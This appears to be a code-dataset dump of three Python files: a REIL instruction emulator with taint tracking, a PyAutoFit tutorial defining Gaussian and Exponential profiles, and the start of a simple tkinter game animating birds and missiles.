    def reset(self):
        """Discard all memory contents."""
        # Dictionary that implements the memory itself.
        self._memory = {}

    # Magic methods
    # ======================================================================== #
    def __str__(self):
        lines = []

        for addr in sorted(self._memory.keys()):
            lines += ["0x%08x : 0x%08x" % (addr, self._memory[addr])]

        return "\n".join(lines)
class ReilMemoryEx(ReilMemory):

    """Reil memory extended class.

    Extends ReilMemory with write bookkeeping: it remembers the previous
    value of every overwritten byte, counts write operations and can
    search memory for addresses holding a given value.
    """

    def __init__(self, address_size):
        super(ReilMemoryEx, self).__init__(address_size)

        # Previous state of memory (per-byte values before their last overwrite).
        self.__memory_prev = {}

        # Write operations counter.
        self.__write_count = 0

    # Read methods
    # ======================================================================== #
    def read_inverse(self, value, size):
        """Return a list of memory addresses that contain the specified
        value.
        """
        # Candidate start addresses: bytes equal to the low byte of `value`.
        addr_candidates = [addr for addr, val in self._memory.items()
                           if val == (value & 0xff)]
        addr_matchings = []

        for addr in addr_candidates:
            match = True

            # NOTE: `range` (not Python 2's `xrange`) keeps this working
            # on both Python 2 and 3.
            for i in range(0, size):
                byte_curr = (value >> (i * 8)) & 0xff
                try:
                    match = self._memory[addr + i] == byte_curr
                except KeyError:
                    match = False

                if not match:
                    break

            if match:
                addr_matchings += [addr]

        return addr_matchings

    def try_read(self, address, size):
        """Try to read memory content at specified address.

        If any location was not written before, it returns a tuple
        (False, None). Otherwise, it returns (True, memory content).
        """
        value = 0x0

        for i in range(0, size):
            addr = address + i

            if addr in self._memory:
                value = self._read_byte(addr) << (i * 8) | value
            else:
                return False, None

        return True, value

    def try_read_prev(self, address, size):
        """Try to read previous memory content at specified address.

        If any location was not written before, it returns a tuple
        (False, None). Otherwise, it returns (True, memory content).
        """
        value = 0x0

        for i in range(0, size):
            addr = address + i

            if addr in self.__memory_prev:
                _, val_byte = self.__try_read_byte_prev(addr)
                value = val_byte << (i * 8) | value
            else:
                return False, None

        return True, value

    def __try_read_byte_prev(self, address):
        """Read previous value for memory location.

        Return a tuple (True, Byte) in case of successful read,
        (False, None) otherwise.
        """
        # No previous value recorded for this address.
        if address not in self.__memory_prev:
            return False, None

        return True, self.__memory_prev[address]

    # Write methods
    # ======================================================================== #
    def write(self, address, size, value):
        """Write arbitrary size content to memory.
        """
        for i in range(0, size):
            self.__write_byte(address + i, (value >> (i * 8)) & 0xff)

        self.__write_count += 1

    def __write_byte(self, address, value):
        """Write byte in memory, remembering any overwritten value.
        """
        # Save previous address content.
        if address in self._memory:
            self.__memory_prev[address] = self._memory[address]

        self._memory[address] = value & 0xff

    # Misc methods
    # ======================================================================== #
    def reset(self):
        """Clear memory, the previous-state map and the write counter."""
        super(ReilMemoryEx, self).reset()

        # Previous state of memory.
        self.__memory_prev = {}

        # Write operations counter.
        self.__write_count = 0

    def get_addresses(self):
        """Get accessed addresses.
        """
        return self._memory.keys()

    def get_write_count(self):
        """Get number of write operations performed on the memory.
        """
        return self.__write_count
class ReilCpuZeroDivisionError(Exception):
    """Raised by the REIL CPU on a division (or modulo) by zero."""
    pass


class ReilCpuInvalidAddressError(Exception):
    """Raised by the REIL CPU when an invalid address is accessed."""
    pass


class ReilCpuInvalidInstruction(Exception):
    """Raised by the REIL CPU when an invalid instruction is found."""
    pass
class ReilCpu(object):
    def __init__(self, arch, memory, tainter, emulator):
        """Build a REIL CPU.

        :param arch: architecture information object.
        :param memory: REIL memory instance.
        :param tainter: taint tracker, invoked after each executed instruction.
        :param emulator: owning REIL emulator, passed to user handlers.
        """
        # Architecture information.
        self.__arch = arch

        # Reil emulator instance.
        self.__emu = emulator

        # Reil memory instance.
        self.__mem = memory

        # Reil tainter instance.
        self.__tainter = tainter

        # Registers.
        self.__regs = dict()
        self.__regs_written = set()
        self.__regs_read = set()

        # Instructions pre and post handlers.
        self.__instr_handler_pre = None, None
        self.__instr_handler_post = None, None

        # Instruction implementation: dispatch table mapping each REIL
        # mnemonic to its executor method.
        self.__executors = {
            # Arithmetic Instructions
            ReilMnemonic.ADD : self.__execute_binary_op,
            ReilMnemonic.SUB : self.__execute_binary_op,
            ReilMnemonic.MUL : self.__execute_binary_op,
            ReilMnemonic.DIV : self.__execute_binary_op,
            ReilMnemonic.SDIV : self.__execute_binary_op,
            ReilMnemonic.MOD : self.__execute_binary_op,
            ReilMnemonic.SMOD : self.__execute_binary_op,
            ReilMnemonic.BSH : self.__execute_bsh,

            # Bitwise Instructions
            ReilMnemonic.AND : self.__execute_binary_op,
            ReilMnemonic.OR : self.__execute_binary_op,
            ReilMnemonic.XOR : self.__execute_binary_op,

            # Data Transfer Instructions
            ReilMnemonic.LDM : self.__execute_ldm,
            ReilMnemonic.STM : self.__execute_stm,
            ReilMnemonic.STR : self.__execute_str,

            # Conditional Instructions
            ReilMnemonic.BISZ : self.__execute_bisz,
            ReilMnemonic.JCC : self.__execute_jcc,

            # Other Instructions
            ReilMnemonic.UNDEF : self.__execute_undef,
            ReilMnemonic.UNKN : self.__execute_unkn,
            ReilMnemonic.NOP : self.__execute_skip,

            # Ad hoc Instructions
            ReilMnemonic.RET : self.__execute_skip,

            # Extensions
            ReilMnemonic.SEXT : self.__execute_sext,
        }

        self.__set_default_handlers()
def execute(self, instr):
if DEBUG:
print("0x%08x:%02x : %s" % (instr.address >> 8,
instr.address & 0xff,
instr))
# Execute pre instruction handlers
handler_fn_pre, handler_param_pre = self.__instr_handler_pre
handler_fn_pre(self.__emu, instr, handler_param_pre)
# Execute instruction
next_addr = self.__executors[instr.mnemonic](instr)
# Taint instruction
self.__tainter.taint(instr)
# Execute post instruction handlers
handler_fn_post, handler_param_post = self.__instr_handler_post
handler_fn_post(self.__emu, instr, handler_param_post)
return next_addr
def reset(self):
# Registers.
self.__regs = dict()
self.__regs_written = set()
self.__regs_read = set()
# Instructions pre and post handlers.
self.__instr_handler_pre = None, None
self.__instr_handler_post = None, None
self.__set_default_handlers()
# Properties
# ======================================================================== #
@property
def registers(self):
return self.__regs
@registers.setter
def registers(self, value):
self.__regs = value
@property
def read_registers(self):
return self.__regs_read
@property
def written_registers(self):
return self.__regs_written
# Instruction's handler methods
# ======================================================================== #
def set_instruction_pre_handler(self, function, parameter):
self.__instr_handler_pre = (function, parameter)
def set_instruction_post_handler(self, function, parameter):
self.__instr_handler_post = (function, parameter)
# Instruction's handler auxiliary methods
# ======================================================================== #
def __set_default_handlers(self):
empty_fn, empty_param = lambda emu, instr, param: None, None
self.__instr_handler_pre = (empty_fn, empty_param)
self.__instr_handler_post = (empty_fn, empty_param)
# Read/Write methods
# ======================================================================== #
def read_operand(self, operand):
if isinstance(operand, ReilRegisterOperand):
value = self.__read_register(operand)
elif isinstance(operand, ReilImmediateOperand):
value = operand.immediate
else:
raise Exception("Invalid operand type : %s" % str(operand))
return value
def write_operand(self, operand, value):
if isinstance(operand, ReilRegisterOperand):
self.__write_register(operand, value)
else:
raise Exception("Invalid operand type : %s" % str(operand))
def read_memory(self, address, size):
value = self.__mem.read(address, size)
if DEBUG:
self.__debug_read_memory(address, size, value)
return value
def write_memory(self, address, size, value):
self.__mem.write(address, size, value)
if DEBUG:
self.__debug_write_memory(address, size, value)
# Read/Write auxiliary methods
# ======================================================================== #
def __get_register_info(self, register):
if register.name in self.__arch.alias_mapper:
base_register, offset = self.__arch.alias_mapper[register.name]
base_size = self.__arch.registers_size[base_register]
else:
base_register, offset = register.name, 0
base_size = register.size
return base_register, base_size, offset
def __get_register_value(self, register):
base_register, base_size, offset = self.__get_register_info(register)
if base_register not in self.__regs:
self.__regs[base_register] = random.randint(0, 2**base_size - 1)
base_value = self.__regs[base_register]
return base_register, base_value, offset
def __read_register(self, register):
base_register, base_value, offset = self.__get_register_value(register)
value = extract_value(base_value, offset, register.size)
# Keep track of native register reads.
if register.name in self.__arch.registers_gp_all:
self.__regs_read.add(register.name)
if DEBUG:
self.__debug_read_operand(base_register, register.name, value)
return value
def __write_register(self, register, value):
base_register, base_value, offset = self.__get_register_value(register)
base_value_new = insert_value(base_value, value, offset, register.size)
self.__regs[base_register] = base_value_new
# Keep track of native register writes.
if register.name in self.__arch.registers_gp_all:
self.__regs_written.add(register.name)
if DEBUG:
self.__debug_write_operand(base_register, register.name, value)
# Debug methods
# ======================================================================== #
def __debug_read_operand(self, base_register, register, value):
base_value = self.__regs[base_register]
taint = "T" if self.__tainter.get_register_taint(register) else "-"
params = {
"indent" : " "*10,
"register" : register,
"value" : value,
"base_register" : base_register,
"base_value" : base_value,
"taint" : taint
}
fmt = "{indent}r{{ {register:s} = {value:08x} [{taint:s}] " + \
"({base_register:s} = {base_value:08x})}}"
print(fmt.format(**params))
def __debug_write_operand(self, base_register, register, value):
base_value = self.__regs[base_register]
taint = "T" if self.__tainter.get_register_taint(register) else "-"
params = {
"indent" : " "*10,
"register" : register,
"value" : value,
"base_register" : base_register,
"base_value" : base_value,
"taint" : taint
}
fmt = "{indent}w{{ {register:s} = {value:08x} [{taint:s}] " + \
"({base_register:s} = {base_value:08x})}}"
print(fmt.format(**params))
def __debug_read_memory(self, address, size, value):
taint = "T" if self.__tainter.get_memory_taint(address, size) else "-"
params = {
"indent" : " "*10,
"address" : address,
"value" : value,
"taint" : taint
}
fmt = "{indent}r{{ m[{address:08x}] = {value:08x} [{taint:s}]}}"
print(fmt.format(**params))
def __debug_write_memory(self, address, size, value):
taint = "T" if self.__tainter.get_memory_taint(address, size) else "-"
params = {
"indent" : " "*10,
"address" : address,
"value" : value,
"taint" : taint
}
fmt = "{indent}w{{ m[{address:08x}] = {value:08x} [{taint:s}]}}"
print(fmt.format(**params))
# ======================================================================== #
# REIL instructions implementation
# ======================================================================== #
# Arithmetic instructions
# ======================================================================== #
def __execute_bsh(self, instr):
"""Execute BSH instruction.
"""
op0_val = self.read_operand(instr.operands[0])
op1_val = self.read_operand(instr.operands[1])
op1_size = instr.operands[1].size
# Check sign bit.
if extract_sign_bit(op1_val, op1_size) == 0:
op2_val = op0_val << op1_val
else:
op2_val = op0_val >> twos_complement(op1_val, op1_size)
self.write_operand(instr.operands[2], op2_val)
return None
# Bitwise instructions
# ======================================================================== #
def __signed_div(self, oprnd0, oprnd1, result_size):
op0_val = self.read_operand(oprnd0)
op1_val = self.read_operand(oprnd1)
op0_sign = op0_val >> oprnd0.size-1
op1_sign = op1_val >> oprnd1.size-1
result_sign = op0_sign ^ op1_sign
print(oprnd0.size, oprnd1.size, hex)
if op0_sign == 0x1:
op0_tmp = twos_complement(op0_val, oprnd0.size)
else:
op0_tmp = op0_val
if op1_sign == 0x1:
op1_tmp = twos_complement(op1_val, oprnd1.size)
else:
op1_tmp = op1_val
result_tmp = op0_tmp / op1_tmp
if result_sign == 0x1:
result = twos_complement(result_tmp, result_size)
else:
result = result_tmp
print(hex(op0_val), hex(op0_tmp), hex(op1_val), hex(op1_tmp), hex(result_sign), hex(result_tmp), hex(result))
return result & (2**result_size-1)
def __signed_mod(self, oprnd0, oprnd1, result_size):
op0_val = self.read_operand(oprnd0)
op1_val = self.read_operand(oprnd1)
quotient = self.__signed_div(oprnd0, oprnd1, result_size)
remainder = op0_val - (op1_val * quotient)
return remainder & (2**result_size-1)
def __execute_binary_op(self, instr):
op_map = {
ReilMnemonic.ADD : lambda a, b: a + b,
ReilMnemonic.SUB : lambda a, b: a - b,
ReilMnemonic.MUL : lambda a, b: a * b, # unsigned multiplication
ReilMnemonic.DIV : lambda a, b: a / b, # unsigned division
ReilMnemonic.MOD : lambda a, b: a % b, # unsigned modulo
ReilMnemonic.AND : lambda a, b: a & b,
ReilMnemonic.OR : lambda a, b: a | b,
ReilMnemonic.XOR : lambda a, b: a ^ b,
}
op0_val = self.read_operand(instr.operands[0])
op1_val = self.read_operand(instr.operands[1])
if instr.mnemonic in [ReilMnemonic.DIV, ReilMnemonic.MOD] and \
op1_val == 0:
raise ReilCpuZeroDivisionError()
if instr.mnemonic in [ReilMnemonic.SDIV]:
op2_val = self.__signed_div(instr.operands[0], instr.operands[1], instr.operands[2].size)
elif instr.mnemonic in [ReilMnemonic.SMOD]:
op2_val = self.__signed_mod(instr.operands[0], instr.operands[1], instr.operands[2].size)
else:
op2_val = op_map[instr.mnemonic](op0_val, op1_val)
self.write_operand(instr.operands[2], op2_val)
# Data transfer instructions
# ======================================================================== #
def __execute_ldm(self, instr):
"""Execute LDM instruction.
"""
assert instr.operands[0].size == self.__arch.address_size
assert instr.operands[2].size in [8, 16, 32, 64]
# Memory address.
op0_val = self.read_operand(instr.operands[0])
# Data.
op2_val = self.read_memory(op0_val, instr.operands[2].size / 8)
self.write_operand(instr.operands[2], op2_val)
return None
def __execute_stm(self, instr):
"""Execute STM instruction.
"""
assert instr.operands[0].size in [8, 16, 32, 64]
assert instr.operands[2].size == self.__arch.address_size
op0_val = self.read_operand(instr.operands[0]) # Data.
op2_val = self.read_operand(instr.operands[2]) # Memory address.
op0_size = instr.operands[0].size
self.write_memory(op2_val, op0_size / 8, op0_val)
return None
def __execute_str(self, instr):
"""Execute STR instruction.
"""
op0_val = self.read_operand(instr.operands[0])
self.write_operand(instr.operands[2], op0_val)
return None
# Conditional instructions
# ======================================================================== #
def __execute_bisz(self, instr):
"""Execute BISZ instruction.
"""
op0_val = self.read_operand(instr.operands[0])
op2_val = 1 if op0_val == 0 else 0
self.write_operand(instr.operands[2], op2_val)
return None
def __execute_jcc(self, instr):
"""Execute JCC instruction.
"""
op0_val = self.read_operand(instr.operands[0]) # Branch condition.
op2_val = self.read_operand(instr.operands[2]) # Target address.
return op2_val if op0_val != 0 else None
# Other instructions
# ======================================================================== #
def __execute_undef(self, instr):
"""Execute UNDEF instruction.
"""
op2_val = random.randint(0, instr.operands[2].size)
self.write_operand(instr.operands[2], op2_val)
return None
def __execute_unkn(self, instr):
"""Execute UNKN instruction.
"""
raise ReilCpuInvalidInstruction()
def __execute_skip(self, instr):
"""Skip instruction.
"""
return None
# REIL extension instructions
# ======================================================================== #
def __execute_sext(self, instr):
"""Execute SEXT instruction.
"""
op0_size = instr.operands[0].size
op2_size = instr.operands[2].size
op0_val = self.read_operand(instr.operands[0])
op0_msb = extract_sign_bit(op0_val, op0_size)
op2_mask = (2**op2_size-1) & ~(2**op0_size-1) if op0_msb == 1 else 0x0
op2_val = op0_val | op2_mask
self.write_operand(instr.operands[2], op2_val)
return None
class ReilEmulatorTainter(object):
    """Taint-propagation engine for the REIL emulator.

    Taint is tracked at register granularity (flags individually) and at
    byte granularity for memory, and is propagated per-instruction via a
    per-mnemonic dispatch table.
    """

    def __init__(self, arch, emulator):
        # Architecture information.
        self.__arch = arch
        # Reil emulator instance (used to resolve memory addresses).
        self.__emu = emulator
        # Taint information.
        self.__taint_reg = {}   # Register-level tainting
        self.__taint_mem = {}   # Byte-level tainting
        # Taint function lookup table.
        self.__tainter = {
            # Arithmetic Instructions
            ReilMnemonic.ADD : self.__taint_binary_op,
            ReilMnemonic.SUB : self.__taint_binary_op,
            ReilMnemonic.MUL : self.__taint_binary_op,
            ReilMnemonic.DIV : self.__taint_binary_op,
            ReilMnemonic.SDIV : self.__taint_binary_op,
            ReilMnemonic.MOD : self.__taint_binary_op,
            ReilMnemonic.SMOD : self.__taint_binary_op,
            ReilMnemonic.BSH : self.__taint_binary_op,
            # Bitwise Instructions
            ReilMnemonic.AND : self.__taint_binary_op,
            ReilMnemonic.OR : self.__taint_binary_op,
            ReilMnemonic.XOR : self.__taint_binary_op,
            # Data Transfer Instructions
            ReilMnemonic.LDM : self.__taint_load,
            ReilMnemonic.STM : self.__taint_store,
            ReilMnemonic.STR : self.__taint_move,
            # Conditional Instructions
            ReilMnemonic.BISZ : self.__taint_move,
            ReilMnemonic.JCC : self.__taint_nothing,
            # Other Instructions
            ReilMnemonic.UNDEF : self.__taint_undef,
            ReilMnemonic.UNKN : self.__taint_nothing,
            ReilMnemonic.NOP : self.__taint_nothing,
            # Ad hoc Instructions
            ReilMnemonic.RET : self.__taint_nothing,
            # Extensions
            ReilMnemonic.SEXT : self.__taint_move,
        }

    def taint(self, instruction):
        """Propagate taint for a single REIL instruction."""
        self.__tainter[instruction.mnemonic](instruction)

    def reset(self):
        """Clear all register and memory taint."""
        # Taint information.
        self.__taint_reg = {}
        self.__taint_mem = {}

    # Operand taint methods
    # ======================================================================== #
    def get_operand_taint(self, operand):
        """Return the taint of a register operand (immediates are never tainted)."""
        if isinstance(operand, ReilRegisterOperand):
            taint = self.get_register_taint(operand.name)
        elif isinstance(operand, ReilImmediateOperand):
            taint = False
        else:
            raise Exception("Invalid operand: %s" % str(operand))
        return taint

    def set_operand_taint(self, operand, taint):
        if isinstance(operand, ReilRegisterOperand):
            self.set_register_taint(operand.name, taint)
        else:
            raise Exception("Invalid operand: %s" % str(operand))

    def clear_operand_taint(self, operand):
        if isinstance(operand, ReilRegisterOperand):
            self.clear_register_taint(operand)
        else:
            raise Exception("Invalid operand: %s" % str(operand))

    # Memory taint methods
    # ======================================================================== #
    def get_memory_taint(self, address, size):
        """Return the taint of the byte range [address, address + size).

        The range is tainted if any byte in it is tainted.
        """
        tainted = False
        # NOTE: range (not the Python-2-only xrange) keeps this module
        # usable on Python 3, matching its print()-function style.
        for i in range(0, size):
            tainted = tainted or self.__taint_mem.get(address + i, False)
        return tainted

    def set_memory_taint(self, address, size, taint):
        """Set the taint of every byte in [address, address + size)."""
        for i in range(0, size):
            self.__taint_mem[address + i] = taint

    def clear_memory_taint(self, address, size):
        """Clear the taint of every byte in [address, address + size)."""
        for i in range(0, size):
            self.__taint_mem[address + i] = False

    # Register taint methods
    # ======================================================================== #
    def get_register_taint(self, register):
        return self.__taint_reg.get(self.__get_base_register(register), False)

    def set_register_taint(self, register, taint):
        self.__taint_reg[self.__get_base_register(register)] = taint

    def clear_register_taint(self, register):
        self.__taint_reg[self.__get_base_register(register)] = False

    # Taint auxiliary methods
    # ======================================================================== #
    def __get_base_register(self, register):
        # Sub-registers share taint with their base register.
        if register in self.__arch.alias_mapper and \
            register not in self.__arch.registers_flags:
            # NOTE: Flags are tainted individually.
            base_name, _ = self.__arch.alias_mapper[register]
        else:
            base_name = register
        return base_name

    # Taint methods
    # ======================================================================== #
    def __taint_binary_op(self, instr):
        """Destination is tainted if either source operand is tainted."""
        # Get taint information.
        op0_taint = self.get_operand_taint(instr.operands[0])
        op1_taint = self.get_operand_taint(instr.operands[1])
        # Propagate taint.
        self.set_operand_taint(instr.operands[2], op0_taint or op1_taint)

    def __taint_load(self, instr):
        """Taint LDM instruction.
        """
        # Get memory address.
        op0_val = self.__emu.read_operand(instr.operands[0])
        # Get taint information. Size is in bits; // keeps the byte count
        # an int on Python 3.
        op0_taint = self.get_memory_taint(op0_val, instr.operands[2].size // 8)
        # Propagate taint.
        self.set_operand_taint(instr.operands[2], op0_taint)

    def __taint_store(self, instr):
        """Taint STM instruction.
        """
        # Get memory address.
        op2_val = self.__emu.read_operand(instr.operands[2])
        # Get taint information.
        op0_size = instr.operands[0].size
        op0_taint = self.get_operand_taint(instr.operands[0])
        # Propagate taint to the written byte range.
        self.set_memory_taint(op2_val, op0_size // 8, op0_taint)

    def __taint_move(self, instr):
        """Taint registers move instruction.
        """
        # Get taint information.
        op0_taint = self.get_operand_taint(instr.operands[0])
        # Propagate taint.
        self.set_operand_taint(instr.operands[2], op0_taint)

    def __taint_undef(self, instr):
        """Taint UNDEF instruction (destination becomes untainted).
        """
        self.set_operand_taint(instr.operands[2], False)

    def __taint_nothing(self, instr):
        """Taint nothing.
        """
        pass
class ReilEmulator(object):
    """Reil Emulator.

    Facade that wires together a ReilCpu, a ReilMemory and a
    ReilEmulatorTainter and exposes execution, read/write and taint
    operations through a single object.
    """
    def __init__(self, arch, cpu=None, memory=None):
        # Architecture information.
        self.__arch = arch
        # An instance of a ReilTainter.
        self.__tainter = ReilEmulatorTainter(self.__arch, self)
        # An instance of a ReilMemory.
        self.__mem = memory if memory else ReilMemoryEx(self.__arch.address_size)
        # An instance of a ReilCpu.
        self.__cpu = cpu if cpu else ReilCpu(self.__arch, self.__mem, self.__tainter, self)
    # Execution methods
    # ======================================================================== #
    def execute(self, container, start=None, end=None, registers=None):
        """Execute instructions.

        Runs from *start* (or the container's first address) until the
        instruction pointer reaches *end* or falls off the container.
        Returns a (registers dict, memory) tuple with the final state.
        """
        if registers:
            self.__cpu.registers = dict(registers)
        ip = start if start else container[0].address
        while ip and ip != end:
            try:
                instr = container.fetch(ip)
            except ReilContainerInvalidAddressError:
                raise ReilCpuInvalidAddressError()
            next_ip = self.__cpu.execute(instr)
            # Fall through sequentially unless the instruction (e.g. a
            # taken JCC) produced an explicit target address.
            ip = next_ip if next_ip else container.get_next_address(ip)
        return dict(self.__cpu.registers), self.__mem
    def execute_lite(self, instructions, context=None):
        """Execute a list of instructions. It does not support loops.

        Returns a (registers dict, memory) tuple with the final state.
        """
        if context:
            self.__cpu.registers = dict(context)
        for instr in instructions:
            self.__cpu.execute(instr)
        return dict(self.__cpu.registers), self.__mem
    # Reset methods
    # ======================================================================== #
    def reset(self):
        """Reset emulator. All registers and memory are reset.
        """
        self.__mem.reset()
        self.__cpu.reset()
        self.__tainter.reset()
    def reset_memory(self):
        """Reset only the memory state."""
        self.__mem.reset()
    def reset_cpu(self):
        """Reset only the CPU state (registers and handlers)."""
        self.__cpu.reset()
    def reset_tainter(self):
        """Reset only the taint state."""
        self.__tainter.reset()
    # Handler methods
    # ======================================================================== #
    def set_instruction_pre_handler(self, function, parameter):
        self.__cpu.set_instruction_pre_handler(function, parameter)
    def set_instruction_post_handler(self, function, parameter):
        self.__cpu.set_instruction_post_handler(function, parameter)
    # Read/Write methods
    # ======================================================================== #
    def read_operand(self, operand):
        return self.__cpu.read_operand(operand)
    def write_operand(self, operand, value):
        self.__cpu.write_operand(operand, value)
    def read_memory(self, address, size):
        return self.__mem.read(address, size)
    def write_memory(self, address, size, value):
        self.__mem.write(address, size, value)
    # Taint methods
    # ======================================================================== #
    def get_operand_taint(self, register):
        return self.__tainter.get_operand_taint(register)
    def set_operand_taint(self, register, value):
        self.__tainter.set_operand_taint(register, value)
    def clear_operand_taint(self, register):
        self.__tainter.clear_operand_taint(register)
    def get_register_taint(self, register):
        return self.__tainter.get_register_taint(register)
    def set_register_taint(self, register, value):
        self.__tainter.set_register_taint(register, value)
    def clear_register_taint(self, register):
        self.__tainter.clear_register_taint(register)
    def get_memory_taint(self, address, size):
        return self.__tainter.get_memory_taint(address, size)
    def set_memory_taint(self, address, size, value):
        self.__tainter.set_memory_taint(address, size, value)
    def clear_memory_taint(self, address, size):
        self.__tainter.clear_memory_taint(address, size)
    # Properties
    # ======================================================================== #
    @property
    def registers(self):
        """Return registers.
        """
        return self.__cpu.registers
    @registers.setter
    def registers(self, value):
        """Set registers.
        """
        self.__cpu.registers = value
    @property
    def memory(self):
        """Return memory.
        """
        return self.__mem
    @property
    def cpu(self):
        """Return the CPU.
        """
        return self.__cpu
    @property
    def read_registers(self):
        """Return read (native) registers.
        """
        return self.__cpu.read_registers
    @property
    def written_registers(self):
        """Return written (native) registers.
        """
        return self.__cpu.written_registers
| [
"[email protected]"
] | |
be8a44a141a5d792643c73427964c8088de152e4 | 448756d7ff6c9cbdf0a8b3b4ff8309207a6bb504 | /scripts/howtofit/chapter_database/profiles.py | 7621d81f9dc7090851b2ab1977513de4f4476fbc | [] | no_license | jonathanfrawley/autofit_workspace_copy | f84c8ed8d8106cbd0735601b54d35104976219cf | 4631ac452f62cd9c3d5257b4d0b2a64630c51ecf | refs/heads/master | 2023-04-21T04:06:20.140963 | 2021-05-13T16:02:59 | 2021-05-13T16:02:59 | 367,427,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,552 | py | import numpy as np
"""
In tutorial 5, we perform modeling using multiple profiles, in particular the `Gaussian` profile from the previous
tutorials and an Exponential profile. In analysis.py, we will edit how model-data is generated from profiles such
that it is the sum of all profiles in our model.
In this module, we thus now have two classes following the PyAutoFit model component format. We have renamed the
module from `gaussian.py` to `profiles.py` to reflect this. We have created an abstract base class `Profile` from
which all profiles inherit.
If you are not familiar with Python classes, in particular inheritance and the `super` method below, you may
be unsure what the classes are doing below. I have included comments describing what these commands do.
The Profile class is a base class from which all profiles we add (e.g Gaussian, Exponential, additional profiles
added down the line) will inherit. This is useful, as it signifies which aspects of our model are different ways of
representing the same thing.
"""
class Profile:
    def __init__(self, centre=0.0, intensity=0.01):
        """
        Abstract base class for 1D profiles.

        Every concrete profile (e.g. `Gaussian`, `Exponential`) has a centre
        and an overall intensity normalisation, so both attributes are set
        here once and subclasses call this initialiser via `super` instead
        of repeating the assignments.

        Parameters
        ----------
        centre : float
            The x coordinate of the profile centre.
        intensity : float
            Overall intensity normalisation of the profile.
        """
        self.centre = centre
        self.intensity = intensity
"""
The inclusion of (Profile) in the `Gaussian` below instructs Python that the `Gaussian` class is going to inherit from
the Profile class.
"""
class Gaussian(Profile):
    def __init__(
        self,
        centre=0.0,  # <- PyAutoFit recognises these constructor arguments
        intensity=0.1,  # <- are the Gaussian`s model parameters.
        sigma=0.01,
    ):
        """
        A 1D Gaussian profile, usable as a PyAutoFit model component whose
        parameters are fitted for by a non-linear search.

        Parameters
        ----------
        centre : float
            The x coordinate of the profile centre.
        intensity : float
            Overall intensity normalisation of the Gaussian profile.
        sigma : float
            The sigma value controlling the width of the Gaussian.
        """
        # Delegate the shared centre/intensity attributes to the Profile
        # base class; only sigma is specific to the Gaussian.
        super().__init__(centre=centre, intensity=intensity)
        self.sigma = sigma

    def profile_from_xvalues(self, xvalues):
        """
        Evaluate the Gaussian on a line of Cartesian x coordinates.

        The input xvalues are shifted into a coordinate system centred on
        the Gaussian before evaluation.

        Parameters
        ----------
        xvalues : np.ndarray
            The x coordinates in the original reference frame of the grid.
        """
        offsets = np.subtract(xvalues, self.centre)
        normalisation = np.divide(self.intensity, self.sigma * np.sqrt(2.0 * np.pi))
        return normalisation * np.exp(-0.5 * np.square(offsets / self.sigma))
class Exponential(Profile):
    def __init__(
        self,
        centre=0.0,  # <- PyAutoFit recognises these constructor arguments are the model
        intensity=0.1,  # <- parameters of the profile.
        rate=0.01,
    ):
        """
        A 1D Exponential profile, usable as a PyAutoFit model component whose
        parameters are fitted for by a non-linear search.

        Parameters
        ----------
        centre : float
            The x coordinate of the profile centre.
        intensity : float
            Overall intensity normalisation of the profile.
        rate : float
            The decay rate controlling how fast the Exponential declines.
        """
        # Shared centre/intensity attributes live on the Profile base class.
        super().__init__(centre=centre, intensity=intensity)
        self.rate = rate

    def profile_from_xvalues(self, xvalues):
        """
        Evaluate the Exponential on a line of Cartesian x coordinates.

        The input xvalues are shifted into a coordinate system centred on
        the Exponential before evaluation.

        Parameters
        ----------
        xvalues : np.ndarray
            The x coordinates in the original reference frame of the grid.
        """
        offsets = np.subtract(xvalues, self.centre)
        return self.intensity * self.rate * np.exp(-1.0 * self.rate * np.abs(offsets))
| [
"[email protected]"
] | |
6a2a59d480d7535ce9790d74f76a9ff441a76d8a | 8c5c74f6f0d19111f2873fcf7763ad1529110cb7 | /Examples/game4.py | a514e08d8424e79f30572b4f0255928ac58bc963 | [] | no_license | lostboy1/cps-108 | 44ba4e4aa6e224f73b8b82ab91c2216bdb821026 | 4264567557ba772f1b5e62ce380cf540af40d5d3 | refs/heads/master | 2023-01-19T13:19:10.469778 | 2020-12-01T07:39:29 | 2020-12-01T07:39:29 | 288,768,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,161 | py |
from tkinter import Tk, Canvas, mainloop
# Maximum missile speed in pixels per animation frame.
SPEED = 10
root = Tk()
c = Canvas(root, width=500, height=500)
c.pack()
# Put drawing here!
# Scene background: blue sky over yellow ground.
c.create_rectangle(0, 0, 500, 300, fill='blue')
c.create_rectangle(0, 300, 500, 500, fill='yellow')
# Target: post and triangular top.
c.create_rectangle(347, 380, 353, 450, fill='white')
c.create_polygon(350, 360, 400, 400, 300, 400, fill='green')
# Bullseye: concentric ovals drawn largest-first so each ring shows.
c.create_oval(80, 320, 140, 380, fill='white')
c.create_oval(85, 320, 135, 380, fill='blue')
c.create_oval(90, 320, 130, 380, fill='red')
c.create_oval(95, 320, 125, 380, fill='white')
c.create_oval(100, 320, 120, 380, fill='blue')
c.create_oval(105, 320, 115, 380, fill='red')
c.create_oval(109, 320, 111, 380, fill='white')
# Sun in the top-right corner and a grey banner along the top.
c.create_oval(440, 0, 550, 110, fill='yellow')
c.create_rectangle(0, 0, 505, 50, fill='light grey')
# Two birds drawn as four-point polygons; points 1 and 3 are the wing tips
# that animate() moves to make the wings flap.
birds = [
    c.create_polygon(300, 175, 335, 200, 300, 185, 265, 200, fill='white'),
    c.create_polygon(165, 125, 200, 150, 165, 135, 130, 150, fill='white'),
]
def animate():
    """Animation loop: flap bird wings and step missiles toward their
    targets, then reschedule itself roughly 24 times a second."""
    # Make bird wings flap.
    # Every 5th frame, toggle each wing tip (coords indices 3 and 7 are
    # the wing-tip y values) to the opposite side of the body centre line.
    if c.count % 5 == 0:
        for bird in birds:
            b = c.coords(bird)
            yc = (b[1] + b[5]) / 2
            for i in 3, 7:
                yw = b[i]
                if yw > yc:
                    b[i] = yc - 20
                else:
                    b[i] = yc + 20
            c.coords(bird, b)
    # Move missiles.
    # Each missile advances toward its (x, y) click target, with per-frame
    # movement clamped to [-SPEED, +SPEED] on each axis.
    for x, y, shape in missiles:
        coords = c.coords(shape)
        mx = coords[0]
        my = coords[1]
        dx = x - mx
        if dx > SPEED:
            dx = +SPEED
        elif dx < -SPEED:
            dx = -SPEED
        dy = y - my
        if dy > SPEED:
            dy = +SPEED
        elif dy < -SPEED:
            dy = -SPEED
        c.move(shape, dx, dy)
    # Re-arm the timer (42 ms ~ 24 fps) and advance the frame counter
    # stored on the canvas object.
    root.after(42, animate)
    c.count = c.count + 1
